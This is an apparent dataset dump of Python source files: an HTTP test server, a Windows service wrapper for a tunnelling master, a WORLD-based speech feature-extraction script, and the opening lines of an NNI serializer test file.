source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
server.py | import BaseHTTPServer
import errno
import os
import re
import socket
from SocketServer import ThreadingMixIn
import ssl
import sys
import threading
import time
import traceback
import types
import urlparse
import routes as default_routes
from logger import get_logger
from request import Server, Request
from response import Response
from router import Router
from utils import HTTPException
"""HTTP server designed for testing purposes.
The server is designed to provide flexibility in the way that
requests are handled, and to provide control both of exactly
what bytes are put on the wire for the response, and in the
timing of sending those bytes.
The server is based on the stdlib HTTPServer, but with some
notable differences in the way that requests are processed.
Overall processing is handled by a WebTestRequestHandler,
which is a subclass of BaseHTTPRequestHandler. This is responsible
for parsing the incoming request. A RequestRewriter is then
applied and may change the request data if it matches a
supplied rule.
Once the request data has been finalised, Request and Response
objects are constructed. These are used by the other parts of the
system to read information about the request and manipulate the
response.
Each request is handled by a particular handler function. The
mapping between Request and the appropriate handler is determined
by a Router. By default handlers are installed to interpret files
under the document root with .py extensions as executable python
files (see handlers.py for the api for such files), .asis files as
bytestreams to be sent literally and all other files to be served
statically.
The handler functions are responsible for either populating the
fields of the response object, which will then be written when the
handler returns, or for directly writing to the output stream.
"""
class RequestRewriter(object):
    """Rewrite request paths that match registered (methods, path) rules."""

    def __init__(self, rules):
        """Object for rewriting the request path.

        :param rules: Initial rules to add; a list of three item tuples
                      (method, input_path, output_path), defined as for
                      register()
        """
        self.rules = {}
        # reversed() so that, when two initial rules share an input_path,
        # the earlier rule in the list wins (last register() call per key).
        for rule in reversed(rules):
            self.register(*rule)
        self.logger = get_logger()

    def register(self, methods, input_path, output_path):
        """Register a rewrite rule.

        :param methods: Set of methods this should match. "*" is a
                        special value indicating that all methods should
                        be matched.
        :param input_path: Path to match for the initial request.
        :param output_path: Path to replace the input path with in
                            the request.
        """
        # Python 2: types.StringTypes is (str, unicode); normalise a bare
        # string into a one-element method list.
        if type(methods) in types.StringTypes:
            methods = [methods]
        self.rules[input_path] = (methods, output_path)

    def rewrite(self, request_handler):
        """Rewrite the path in a BaseHTTPRequestHandler instance, if
        it matches a rule.

        :param request_handler: BaseHTTPRequestHandler for which to
                                rewrite the request.
        """
        split_url = urlparse.urlsplit(request_handler.path)
        if split_url.path in self.rules:
            methods, destination = self.rules[split_url.path]
            if "*" in methods or request_handler.command in methods:
                self.logger.debug("Rewriting request path %s to %s" %
                                  (request_handler.path, destination))
                # Index 2 of a SplitResult-as-list is the path component.
                new_url = list(split_url)
                new_url[2] = destination
                new_url = urlparse.urlunsplit(new_url)
                request_handler.path = new_url
class WebTestServer(ThreadingMixIn, BaseHTTPServer.HTTPServer):
    """Threaded HTTP(S) server with error handling tuned for test runs."""

    allow_reuse_address = True
    # Client-side disconnects that are expected during tests and therefore
    # silently ignored rather than logged as errors.
    acceptable_errors = (errno.EPIPE, errno.ECONNABORTED)
    request_queue_size = 2000

    # Ensure that we don't hang on shutdown waiting for requests
    daemon_threads = True

    def __init__(self, server_address, RequestHandlerClass, router, rewriter, bind_hostname,
                 config=None, use_ssl=False, key_file=None, certificate=None,
                 encrypt_after_connect=False, latency=None, **kwargs):
        """Server for HTTP(s) Requests

        :param server_address: tuple of (server_name, port)
        :param RequestHandlerClass: BaseHTTPRequestHandler-like class to use for
                                    handling requests.
        :param router: Router instance to use for matching requests to handler
                       functions
        :param rewriter: RequestRewriter-like instance to use for preprocessing
                         requests before they are routed
        :param config: Dictionary holding environment configuration settings for
                       handlers to read, or None to use the default values.
        :param use_ssl: Boolean indicating whether the server should use SSL
        :param key_file: Path to key file to use if SSL is enabled.
        :param certificate: Path to certificate to use if SSL is enabled.
        :param encrypt_after_connect: For each connection, don't start encryption
                                      until a CONNECT message has been received.
                                      This enables the server to act as a
                                      self-proxy.
        :param bind_hostname: True to bind the server to both the hostname and
                              port specified in the server_address parameter.
                              False to bind the server only to the port in the
                              server_address parameter, but not to the hostname.
        :param latency: Delay in ms to wait before serving each response, or
                        callable that returns a delay in ms
        """
        self.router = router
        self.rewriter = rewriter

        self.scheme = "https" if use_ssl else "http"
        self.logger = get_logger()
        self.latency = latency

        if bind_hostname:
            hostname_port = server_address
        else:
            hostname_port = ("", server_address[1])

        # super doesn't work here because BaseHTTPServer.HTTPServer is old-style
        BaseHTTPServer.HTTPServer.__init__(self, hostname_port, RequestHandlerClass, **kwargs)

        if config is not None:
            Server.config = config
        else:
            self.logger.debug("Using default configuration")
            Server.config = {"host": server_address[0],
                             "domains": {"": server_address[0]},
                             "ports": {"http": [self.server_address[1]]}}

        self.key_file = key_file
        self.certificate = certificate
        self.encrypt_after_connect = use_ssl and encrypt_after_connect

        if use_ssl and not encrypt_after_connect:
            self.socket = ssl.wrap_socket(self.socket,
                                          keyfile=self.key_file,
                                          certfile=self.certificate,
                                          server_side=True)

    def handle_error(self, request, client_address):
        # sys.exc_info()[1] is the supported spelling of the deprecated
        # sys.exc_value attribute used previously.
        error = sys.exc_info()[1]

        if ((isinstance(error, socket.error) and
             isinstance(error.args, tuple) and
             error.args[0] in self.acceptable_errors)
            or
            (isinstance(error, IOError) and
             error.errno in self.acceptable_errors)):
            pass  # remote hang up before the result is sent
        else:
            self.logger.error(traceback.format_exc())
class WebTestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""RequestHandler for WebTestHttpd"""
protocol_version = "HTTP/1.1"
def handle_one_request(self):
response = None
self.logger = get_logger()
try:
self.close_connection = False
request_line_is_valid = self.get_request_line()
if self.close_connection:
return
request_is_valid = self.parse_request()
if not request_is_valid:
#parse_request() actually sends its own error responses
return
self.server.rewriter.rewrite(self)
request = Request(self)
response = Response(self, request)
if request.method == "CONNECT":
self.handle_connect(response)
return
if not request_line_is_valid:
response.set_error(414)
response.write()
return
self.logger.debug("%s %s" % (request.method, request.request_path))
handler = self.server.router.get_handler(request)
if self.server.latency is not None:
if callable(self.server.latency):
latency = self.server.latency()
else:
latency = self.server.latency
self.logger.warning("Latency enabled. Sleeping %i ms" % latency)
time.sleep(latency / 1000.)
if handler is None:
response.set_error(404)
else:
try:
handler(request, response)
except HTTPException as e:
response.set_error(e.code, e.message)
except Exception as e:
if e.message:
err = [e.message]
else:
err = []
err.append(traceback.format_exc())
response.set_error(500, "\n".join(err))
self.logger.debug("%i %s %s (%s) %i" % (response.status[0],
request.method,
request.request_path,
request.headers.get('Referer'),
request.raw_input.length))
if not response.writer.content_written:
response.write()
# If we want to remove this in the future, a solution is needed for
# scripts that produce a non-string iterable of content, since these
# can't set a Content-Length header. A notable example of this kind of
# problem is with the trickle pipe i.e. foo.js?pipe=trickle(d1)
if response.close_connection:
self.close_connection = True
if not self.close_connection:
# Ensure that the whole request has been read from the socket
request.raw_input.read()
except socket.timeout, e:
self.log_error("Request timed out: %r", e)
self.close_connection = True
return
except Exception as e:
err = traceback.format_exc()
if response:
response.set_error(500, err)
response.write()
self.logger.error(err)
def get_request_line(self):
try:
self.raw_requestline = self.rfile.readline(65537)
except socket.error:
self.close_connection = True
return False
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
return False
if not self.raw_requestline:
self.close_connection = True
return True
def handle_connect(self, response):
self.logger.debug("Got CONNECT")
response.status = 200
response.write()
if self.server.encrypt_after_connect:
self.logger.debug("Enabling SSL for connection")
self.request = ssl.wrap_socket(self.connection,
keyfile=self.server.key_file,
certfile=self.server.certificate,
server_side=True)
self.setup()
return
class WebTestHttpd(object):
    """
    HTTP server designed for testing scenarios.

    Takes a router class which provides one method get_handler which takes a Request
    and returns a handler function.

    :param host: Host from which to serve (default: 127.0.0.1)
    :param port: Port from which to serve (default: 8000)
    :param server_cls: Class to use for the server (default depends on ssl vs non-ssl)
    :param handler_cls: Class to use for the RequestHandler
    :param use_ssl: Use a SSL server if no explicit server_cls is supplied
    :param key_file: Path to key file to use if ssl is enabled
    :param certificate: Path to certificate file to use if ssl is enabled
    :param encrypt_after_connect: For each connection, don't start encryption
                                  until a CONNECT message has been received.
                                  This enables the server to act as a
                                  self-proxy.
    :param router_cls: Router class to use when matching URLs to handlers
    :param doc_root: Document root for serving files
    :param routes: List of routes with which to initialize the router
    :param rewriter_cls: Class to use for request rewriter
    :param rewrites: List of rewrites with which to initialize the rewriter_cls
    :param config: Dictionary holding environment configuration settings for
                   handlers to read, or None to use the default values.
    :param bind_hostname: Boolean indicating whether to bind server to hostname.
    :param latency: Delay in ms to wait before serving each response, or
                    callable that returns a delay in ms

    .. attribute:: host

      The host name or ip address of the server

    .. attribute:: port

      The port on which the server is running

    .. attribute:: router

      The Router object used to associate requests with resources for this server

    .. attribute:: rewriter

      The Rewriter object used for URL rewriting

    .. attribute:: use_ssl

      Boolean indicating whether the server is using ssl

    .. attribute:: started

      Boolean indicating whether the server is running
    """
    def __init__(self, host="127.0.0.1", port=8000,
                 server_cls=None, handler_cls=WebTestRequestHandler,
                 use_ssl=False, key_file=None, certificate=None, encrypt_after_connect=False,
                 router_cls=Router, doc_root=os.curdir, routes=None,
                 rewriter_cls=RequestRewriter, bind_hostname=True, rewrites=None,
                 latency=None, config=None):
        if routes is None:
            routes = default_routes.routes

        self.host = host

        self.router = router_cls(doc_root, routes)
        self.rewriter = rewriter_cls(rewrites if rewrites is not None else [])

        self.use_ssl = use_ssl
        self.logger = get_logger()

        if server_cls is None:
            server_cls = WebTestServer

        if use_ssl:
            if key_file is not None:
                assert os.path.exists(key_file)
            assert certificate is not None and os.path.exists(certificate)

        try:
            self.httpd = server_cls((host, port),
                                    handler_cls,
                                    self.router,
                                    self.rewriter,
                                    config=config,
                                    bind_hostname=bind_hostname,
                                    use_ssl=use_ssl,
                                    key_file=key_file,
                                    certificate=certificate,
                                    encrypt_after_connect=encrypt_after_connect,
                                    latency=latency)
            self.started = False

            # Recover the actually-bound port (important when port=0).
            _host, self.port = self.httpd.socket.getsockname()
        except Exception:
            self.logger.error('Init failed! You may need to modify your hosts file. Refer to README.md.')
            raise

    def start(self, block=False):
        """Start the server.

        :param block: True to run the server on the current thread, blocking,
                      False to run on a separate thread."""
        self.logger.info("Starting http server on %s:%s" % (self.host, self.port))
        self.started = True
        if block:
            self.httpd.serve_forever()
        else:
            self.server_thread = threading.Thread(target=self.httpd.serve_forever)
            self.server_thread.setDaemon(True)  # don't hang on exit
            self.server_thread.start()

    def stop(self):
        """
        Stops the server.

        If the server is not running, this method has no effect.
        """
        if self.started:
            try:
                self.httpd.shutdown()
                self.httpd.server_close()
                self.server_thread.join()
                self.server_thread = None
                self.logger.info("Stopped http server on %s:%s" % (self.host, self.port))
            except AttributeError:
                pass
            self.started = False
        self.httpd = None

    def get_url(self, path="/", query=None, fragment=None):
        """Return a full URL for *path* on this server, or None when stopped."""
        if not self.started:
            return None

        return urlparse.urlunsplit(("http" if not self.use_ssl else "https",
                                    "%s:%s" % (self.host, self.port),
                                    path, query, fragment))
|
MasterService.py | #!/usr/bin/env python
# - encoding: utf-8
import win32serviceutil
import win32service
import win32event
import sys
import servicemanager
import time
import win32timezone
import logging
import traceback
from master import main_master
import threading
from configparser import ConfigParser
from pathlib import Path
cur_exe_dir = Path(sys.argv[0]).parent
master_logger = logging.getLogger()
def init_log():
    """Set the root logger to DEBUG.

    A FileHandler for master.log is created (which creates/opens the file)
    but deliberately not attached; uncomment addHandler to enable it.
    """
    global master_logger
    master_logger.setLevel(logging.DEBUG)
    fileHandler = logging.FileHandler(cur_exe_dir.joinpath('master.log'))
    # master_logger.addHandler(fileHandler)
class MasterService(win32serviceutil.ServiceFramework):
    # Internal service name
    _svc_name_ = "MasterService"
    # Name shown in the Windows service manager
    _svc_display_name_ = "MasterService"
    # Service description
    _svc_description_ = "This code is a shootback MasterService"

    config = ConfigParser()

    def __init__(self, args):
        print('init...')
        # 'Debug' is passed when launched from the command line; any other
        # args value means we were started by the Windows SCM.
        self.debug = args == 'Debug'
        if not self.debug:
            win32serviceutil.ServiceFramework.__init__(self, args)
            self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
        self.working_ = True
        self.args = args
        MasterService.config.read(cur_exe_dir.joinpath('master.ini'))
        self.log('MasterService.__init__')
        try:
            master_logger.info('args=%s', args)
        except BaseException as e:
            self.log('init exception=' + str(e))

    def ReportServiceStatus(self, serviceStatus, waitHint=5000, win32ExitCode=0, svcExitCode=0):
        master_logger.info('ReportServiceStatus status=%d', serviceStatus)
        # In debug (console) mode there is no SCM to report to.
        if not self.debug:
            super(MasterService, self).ReportServiceStatus(serviceStatus, waitHint, win32ExitCode, svcExitCode)

    def SvcDoRun(self):
        # Service entry point: launch the master thread, then poll until
        # SvcStop clears working_.
        master_logger.info('python service SvcDoRun...')
        self.ReportServiceStatus(win32service.SERVICE_START_PENDING)
        try:
            raw_args = MasterService.config.get('master', 'raw_args', fallback='-m 0.0.0.0:8082 -c 0.0.0.0:3390')
            log_fille = cur_exe_dir.joinpath('master.log')
            print('')
            master_thread = threading.Thread(target=main_master, args=(raw_args.split(), log_fille))
            master_thread.start()
            self.ReportServiceStatus(win32service.SERVICE_RUNNING)
            self.log('start')
            while self.working_:
                try:
                    master_logger.info('SvcDoRun looping...')
                except BaseException as e:
                    self.log('SvcDoRun exception=' + str(e) + ':' + traceback.format_exc())
                # logger.info("SvcDoRun looping...")
                time.sleep(3)
                # win32event.WaitForSingleObject(self.hWaitStop, win32event.INFINITE)
            self.log('done')
        except BaseException as e:
            error_log = 'Exception : %s' % e
            self.log(error_log)
            self.SvcStop()

    def log(self, msg):
        # Mirror messages to the Windows event log and our own logger.
        servicemanager.LogInfoMsg(str(msg))
        master_logger.error(msg)

    def SvcStop(self):
        # Tell the SCM we are stopping first.
        self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
        # Signal the run loop to exit.
        # win32event.SetEvent(self.hWaitStop)
        self.working_ = False
# NOTE(review): a commented-out duplicate of this entry point (using an
# explicit servicemanager.Initialize('MasterService', evtsrc_dll) call)
# was removed as dead code.
if __name__ == '__main__':
    init_log()
    # multiprocessing.freeze_support()
    master_logger.info('master service start...')
    if len(sys.argv) > 1 and sys.argv[1] == 'debug':
        # Console debug mode: run the service body directly, no SCM.
        service = MasterService('Debug')
        service.SvcDoRun()
        exit(0)
    if len(sys.argv) == 1:
        # Started by the Windows SCM.
        servicemanager.Initialize()
        servicemanager.PrepareToHostSingle(MasterService)
        servicemanager.StartServiceCtrlDispatcher()
    else:
        # install/remove/start/stop etc. from the command line.
        win32serviceutil.HandleCommandLine(MasterService)
        # The class passed here may be renamed, but must match the class name.
|
feature_extract.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2020 Patrick Lumban Tobing (Nagoya University)
# based on PyTorch implementation for WaveNet vocoder by Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
from __future__ import division
from __future__ import print_function
import argparse
import multiprocessing as mp
import os
import sys
from distutils.util import strtobool
import logging
import numpy as np
from numpy.matlib import repmat
from scipy.interpolate import interp1d
import soundfile as sf
from scipy.signal import firwin
from scipy.signal import lfilter
from utils import find_files
from utils import read_txt
from utils import write_hdf5, read_hdf5
from multiprocessing import Array
import pysptk as ps
import pyworld as pw
#np.set_printoptions(threshold=np.inf)
FS = 24000  # default sampling rate [Hz]
SHIFTMS = 5  # default frame shift [ms]
MINF0 = 40  # default F0 search floor [Hz]
MAXF0 = 700  # default F0 search ceiling [Hz]
MCEP_DIM = 49  # default mel-cepstrum order
MCEP_ALPHA = 0.466 #24k  # frequency-warping alpha for 24 kHz audio
FFTL = 2048  # default FFT length
IRLEN = 1024  # impulse-response length used by mc2e
LOWPASS_CUTOFF = 20  # low-pass cutoff for continuous-F0 smoothing [Hz]
HIGHPASS_CUTOFF = 65  # low-cut cutoff applied to input waveforms [Hz]
OVERWRITE = True  # NOTE(review): defined but not referenced in this chunk
def low_cut_filter(x, fs, cutoff=HIGHPASS_CUTOFF):
    """Apply an FIR low-cut (high-pass) filter to a waveform.

    Args:
        x (ndarray): Waveform sequence
        fs (int): Sampling frequency
        cutoff (float): Cutoff frequency of low cut filter

    Return:
        (ndarray): Low cut filtered waveform sequence
    """
    # Normalise the cutoff to the Nyquist frequency for firwin.
    norm_cutoff = cutoff / (fs // 2)
    # 1023-tap linear-phase FIR; pass_zero=False rejects DC.
    taps = firwin(1023, norm_cutoff, pass_zero=False)
    return lfilter(taps, 1, x)
def analyze(wav, fs=FS, minf0=MINF0, maxf0=MAXF0, fperiod=SHIFTMS, fftl=FFTL, f0=None, time_axis=None):
    """WORLD analysis with a fixed 60 Hz F0 floor.

    Returns (time_axis, f0, spectrogram, aperiodicity).
    NOTE(review): minf0/maxf0 are accepted but unused here; analyze_range
    applies them. Kept for signature compatibility.
    """
    if f0 is None or time_axis is None:
        raw_f0, time_axis = pw.harvest(wav, fs, f0_floor=60.0, frame_period=fperiod)
        f0 = pw.stonemask(wav, raw_f0, time_axis, fs)
    sp = pw.cheaptrick(wav, f0, time_axis, fs, fft_size=fftl)
    ap = pw.d4c(wav, f0, time_axis, fs, fft_size=fftl)
    return time_axis, f0, sp, ap
def analyze_range(wav, fs=FS, minf0=MINF0, maxf0=MAXF0, fperiod=SHIFTMS, fftl=FFTL, f0=None, time_axis=None):
    """WORLD analysis constrained to the [minf0, maxf0] search range.

    Returns (time_axis, f0, spectrogram, aperiodicity).
    """
    if f0 is None or time_axis is None:
        raw_f0, time_axis = pw.harvest(wav, fs, f0_floor=minf0, f0_ceil=maxf0, frame_period=fperiod)
        f0 = pw.stonemask(wav, raw_f0, time_axis, fs)
    sp = pw.cheaptrick(wav, f0, time_axis, fs, fft_size=fftl)
    ap = pw.d4c(wav, f0, time_axis, fs, fft_size=fftl)
    return time_axis, f0, sp, ap
def read_wav(wav_file, cutoff=HIGHPASS_CUTOFF):
    """Load a wav file, optionally applying the low-cut filter.

    A cutoff of 0 disables filtering. Returns (fs, samples).
    """
    x, fs = sf.read(wav_file)
    if cutoff != 0:
        x = low_cut_filter(x, fs, cutoff)
    return fs, x
def convert_f0(f0, f0_mean_src, f0_std_src, f0_mean_trg, f0_std_trg):
    """Map voiced log-F0 from source to target speaker statistics.

    Unvoiced frames (f0 == 0) remain zero. Means/stds are in the log-F0
    domain.
    """
    voiced = f0 > 0
    cvf0 = np.zeros(len(f0))
    scale = f0_std_trg / f0_std_src
    cvf0[voiced] = np.exp(scale * (np.log(f0[voiced]) - f0_mean_src) + f0_mean_trg)
    return cvf0
def mod_pow(cvmcep, mcep, alpha=MCEP_ALPHA, irlen=IRLEN):
    """Match the power of a converted mel-cepstrum to a reference one.

    Adjusts only the 0th coefficient; returns a modified copy.
    """
    converted_energy = ps.mc2e(cvmcep, alpha=alpha, irlen=irlen)
    reference_energy = ps.mc2e(mcep, alpha=alpha, irlen=irlen)
    dpow = np.log(reference_energy / converted_energy) / 2
    adjusted = np.copy(cvmcep)
    adjusted[:, 0] += dpow
    return adjusted
def extfrm(data, npow, power_threshold=-20):
    """Extract frames whose normalized power exceeds a threshold.

    Args:
        data (ndarray): frame-wise features with shape (T, D)
        npow (ndarray): normalized power per frame with shape (T,)
        power_threshold (float): keep frames with npow > this value

    Return:
        (ndarray, tuple): extracted frames and the kept frame indices

    Raises:
        ValueError: if data and npow lengths differ
    """
    T = data.shape[0]
    if T != len(npow):
        # Was `raise("...")`, which raises TypeError (a str is not an
        # exception) and loses the message; raise a proper exception.
        raise ValueError("Length of two vectors is different.")
    valid_index = np.where(npow > power_threshold)
    extdata = data[valid_index]
    assert extdata.shape[0] <= T

    return extdata, valid_index
def spc2npow(spectrogram):
    """Per-frame power of a spectrogram, normalized by the mean, in dB."""
    frame_pow = np.apply_along_axis(spvec2pow, 1, spectrogram)
    mean_pow = np.mean(frame_pow)
    return 10.0 * np.log10(frame_pow / mean_pow)
def spvec2pow(specvec):
    """Average power of a one-sided spectrum vector (length fftl/2 + 1)."""
    half = len(specvec) - 1
    fftl = half * 2
    # DC and Nyquist bins occur once in the full FFT; interior bins twice.
    total = specvec[0] + specvec[half]
    for k in range(1, half):
        total += 2.0 * specvec[k]
    return total / fftl
def low_pass_filter(x, fs, cutoff=LOWPASS_CUTOFF, padding=True):
    """Apply an FIR low-pass filter with edge padding.

    Args:
        x (ndarray): Waveform sequence
        fs (int): Sampling frequency
        cutoff (float): Cutoff frequency of low pass filter

    Return:
        (ndarray): Low pass filtered waveform sequence

    NOTE(review): `padding` is accepted but never consulted — edge
    padding is always applied; confirm before relying on padding=False.
    """
    norm_cutoff = cutoff / (fs // 2)
    numtaps = 255
    taps = firwin(numtaps, norm_cutoff)
    # Pad with edge values, filter, then trim so the output aligns with
    # the input and has the same length (compensates group delay).
    padded = np.pad(x, (numtaps, numtaps), 'edge')
    filtered = lfilter(taps, 1, padded)
    return filtered[numtaps + numtaps // 2: -numtaps // 2]
def convert_continuos_f0(f0):
    """CONVERT F0 TO CONTINUOUS F0

    Linearly interpolates F0 across unvoiced (zero) frames. NOTE: *f0*
    is modified in place (start/end padding) by this function.

    Args:
        f0 (ndarray): original f0 sequence with the shape (T)

    Return:
        (ndarray, ndarray): binary voiced/unvoiced flags and the
        continuous f0, both with the shape (T)
    """
    # get uv information as binary (before any in-place padding)
    uv = np.float32(f0 != 0)
    # guard: an all-unvoiced sequence has nothing to interpolate and
    # previously crashed with IndexError
    if (f0 == 0).all():
        return uv, f0
    # get start and end of f0
    start_f0 = f0[f0 != 0][0]
    end_f0 = f0[f0 != 0][-1]
    # padding start and end of f0 sequence
    start_idx = np.where(f0 == start_f0)[0][0]
    end_idx = np.where(f0 == end_f0)[0][-1]
    f0[:start_idx] = start_f0
    f0[end_idx:] = end_f0
    # get non-zero frame index
    nz_frames = np.where(f0 != 0)[0]
    # perform linear interpolation
    f = interp1d(nz_frames, f0[nz_frames])
    cont_f0 = f(np.arange(0, f0.shape[0]))

    return uv, cont_f0
def main():
    """Extract WORLD/mel-cepstral features for a list of wav files in parallel."""
    parser = argparse.ArgumentParser(
        description="making feature file argsurations.")

    parser.add_argument("--expdir", required=True,
                        type=str, help="directory to save the log")
    parser.add_argument(
        "--waveforms", default=None,
        help="directory or list of filename of input wavfile")
    parser.add_argument(
        "--hdf5dir", default=None,
        help="directory to save hdf5")
    parser.add_argument(
        "--wavdir", default=None,
        help="directory to save of preprocessed wav file")
    parser.add_argument(
        "--wavfiltdir", default=None,
        help="directory to save of preprocessed wav file")
    parser.add_argument(
        "--fs", default=FS,
        type=int, help="Sampling frequency")
    parser.add_argument(
        "--shiftms", default=SHIFTMS,
        type=int, help="Frame shift in msec")
    parser.add_argument(
        "--minf0", default=MINF0,
        type=int, help="minimum f0")
    parser.add_argument(
        "--maxf0", default=MAXF0,
        type=int, help="maximum f0")
    parser.add_argument(
        "--mcep_dim", default=MCEP_DIM,
        type=int, help="Dimension of mel cepstrum")
    parser.add_argument(
        "--mcep_alpha", default=MCEP_ALPHA,
        type=float, help="Alpha of mel cepstrum")
    parser.add_argument(
        "--pow", default=-20,
        type=float, help="Power threshold")
    parser.add_argument(
        "--fftl", default=FFTL,
        type=int, help="FFT length")
    parser.add_argument("--init", default=False,
                        type=strtobool, help="flag for computing stats of dtw-ed feature")
    parser.add_argument(
        "--highpass_cutoff", default=HIGHPASS_CUTOFF,
        type=int, help="Cut off frequency in lowpass filter")
    parser.add_argument(
        "--n_jobs", default=10,
        type=int, help="number of parallel jobs")
    parser.add_argument(
        "--verbose", default=1,
        type=int, help="log message level")
    args = parser.parse_args()

    # set log level (logging.warn is deprecated; use logging.warning)
    if args.verbose == 1:
        logging.basicConfig(level=logging.INFO,
                            format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
                            datefmt='%m/%d/%Y %I:%M:%S',
                            filename=args.expdir + "/feature_extract.log")
        logging.getLogger().addHandler(logging.StreamHandler())
    elif args.verbose > 1:
        logging.basicConfig(level=logging.DEBUG,
                            format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
                            datefmt='%m/%d/%Y %I:%M:%S',
                            filename=args.expdir + "/feature_extract.log")
        logging.getLogger().addHandler(logging.StreamHandler())
    else:
        logging.basicConfig(level=logging.WARN,
                            format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
                            datefmt='%m/%d/%Y %I:%M:%S',
                            filename=args.expdir + "/feature_extract.log")
        logging.getLogger().addHandler(logging.StreamHandler())
        logging.warning("logging is disabled.")

    # read list
    if os.path.isdir(args.waveforms):
        file_list = sorted(find_files(args.waveforms, "*.wav"))
    else:
        file_list = read_txt(args.waveforms)

    # check directory existence
    if (args.wavdir is not None) and (not os.path.exists(args.wavdir)):
        os.makedirs(args.wavdir)
    if (args.wavfiltdir is not None) and (not os.path.exists(args.wavfiltdir)):
        os.makedirs(args.wavfiltdir)
    if not os.path.exists(args.hdf5dir):
        os.makedirs(args.hdf5dir)

    def feature_extract(wav_list, arr, max_frame_list):
        # Worker body: process wav_list, accumulating counters into the
        # shared array arr = [n_wav, n_sample, n_frame] and recording the
        # longest utterance (in frames) in max_frame_list.
        n_wav = len(wav_list)
        n_sample = 0
        n_frame = 0
        max_frame = 0
        count = 1
        for wav_name in wav_list:
            # load wavfile and apply low cut filter
            fs, x = read_wav(wav_name, cutoff=args.highpass_cutoff)
            n_sample += x.shape[0]
            logging.info(wav_name+" "+str(x.shape[0])+" "+str(n_sample)+" "+str(count))

            # check sampling frequency
            if not fs == args.fs:
                logging.info("ERROR: sampling frequency is not matched.")
                sys.exit(1)

            hdf5name = args.hdf5dir + "/" + os.path.basename(wav_name).replace(".wav", ".h5")

            if not args.init:
                # Full feature extraction with the configured F0 range.
                time_axis_range, f0_range, spc_range, ap_range = analyze_range(
                    x, fs=fs, minf0=args.minf0,
                    maxf0=args.maxf0, fperiod=args.shiftms, fftl=args.fftl)
                write_hdf5(hdf5name, "/f0_range", f0_range)

                uv_range, cont_f0_range = convert_continuos_f0(np.array(f0_range))
                cont_f0_lpf_range = \
                    low_pass_filter(cont_f0_range, int(1.0 / (args.shiftms * 0.001)), cutoff=20)

                codeap_range = pw.code_aperiodicity(ap_range, fs)
                mcep_range = ps.sp2mc(spc_range, args.mcep_dim, args.mcep_alpha)
                npow_range = spc2npow(spc_range)
                mcepspc_range, spcidx_range = extfrm(mcep_range, npow_range, power_threshold=args.pow)
                logging.info(wav_name+" "+str(mcepspc_range.shape[0])+" "+str(mcepspc_range.shape[1])+
                             " "+str(count))

                cont_f0_lpf_range = np.expand_dims(cont_f0_lpf_range, axis=-1)
                uv_range = np.expand_dims(uv_range, axis=-1)
                if codeap_range.ndim == 1:
                    # single-band aperiodicity comes back 1-D; make it a column
                    codeap_range = np.expand_dims(codeap_range, axis=-1)
                feat_org_lf0 = np.c_[uv_range, np.log(cont_f0_lpf_range), codeap_range, mcep_range]
                write_hdf5(hdf5name, "/feat_org_lf0", feat_org_lf0)
                write_hdf5(hdf5name, "/npow_range", npow_range)
                write_hdf5(hdf5name, "/spcidx_range", spcidx_range)

                n_frame += feat_org_lf0.shape[0]
                if max_frame < feat_org_lf0.shape[0]:
                    max_frame = feat_org_lf0.shape[0]

                if args.highpass_cutoff != 0 and args.wavfiltdir is not None:
                    sf.write(args.wavfiltdir + "/" + os.path.basename(wav_name), x, fs, 'PCM_16')
                # Resynthesize an anchor waveform from the extracted features.
                wavpath = args.wavdir + "/" + os.path.basename(wav_name)
                logging.info(wavpath)
                sp_rec = ps.mc2sp(mcep_range, args.mcep_alpha, args.fftl)
                wav = np.clip(pw.synthesize(f0_range, sp_rec, ap_range, fs, frame_period=args.shiftms),
                              -1, 1)
                sf.write(wavpath, wav, fs, 'PCM_16')
            else:
                # Init pass: only F0 and power statistics are needed.
                time_axis, f0, spc, ap = analyze(x, fs=fs, fperiod=args.shiftms, fftl=args.fftl)
                write_hdf5(hdf5name, "/f0", f0)
                npow = spc2npow(spc)
                write_hdf5(hdf5name, "/npow", npow)
                n_frame += f0.shape[0]
                if max_frame < f0.shape[0]:
                    max_frame = f0.shape[0]
            count += 1

        arr[0] += n_wav
        arr[1] += n_sample
        arr[2] += n_frame
        max_frame_list.append(max_frame)
        if (n_wav > 0):
            logging.info(str(arr[0])+" "+str(n_wav)+" "+str(arr[1])+" "+str(n_sample/n_wav)+" "+
                         str(arr[2])+" "+str(n_frame/n_wav)+" max_frame = "+str(max_frame))

    # divide list
    file_lists = np.array_split(file_list, args.n_jobs)
    file_lists = [f_list.tolist() for f_list in file_lists]

    # multi processing
    with mp.Manager() as manager:
        processes = []
        arr = mp.Array('d', 3)
        max_frame_list = manager.list()
        for f in file_lists:
            p = mp.Process(target=feature_extract, args=(f, arr, max_frame_list))
            p.start()
            processes.append(p)

        # wait for all process
        for p in processes:
            p.join()

        logging.info(str(arr[0])+" "+str(arr[1])+" "+str(arr[1]/arr[0])+" "+str(arr[2])+" "+str(arr[2]/arr[0]))
        logging.info('max_frame: %ld' % (np.max(max_frame_list)))


if __name__ == "__main__":
    main()
|
test_serializer.py | import math
import os
import pickle
import subprocess
import sys
from pathlib import Path
import pytest
import nni
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.datasets import MNIST
from nni.common.serializer import is_traceable
if True:  # prevent auto formatting
    sys.path.insert(0, Path(__file__).parent.as_posix())
    from imported.model import ImportTest

# this test cannot be directly put in this file. It will cause syntax error for python <= 3.7.
if tuple(sys.version_info) >= (3, 8):
    from imported._test_serializer_py38 import test_positional_only
@nni.trace
class SimpleClass:
    """Minimal traceable fixture class used throughout this module."""

    def __init__(self, a, b=1):
        self._a = a
        self._b = b
@nni.trace
class EmptyClass:
    """Traceable class with no constructor arguments."""
    pass
class UnserializableSimpleClass:
    """Plain, untraced class; serialization must fall back to byte payloads."""

    def __init__(self):
        self._a = 1
def test_simple_class():
    """Round-trip a traced class through dump/load and check its state."""
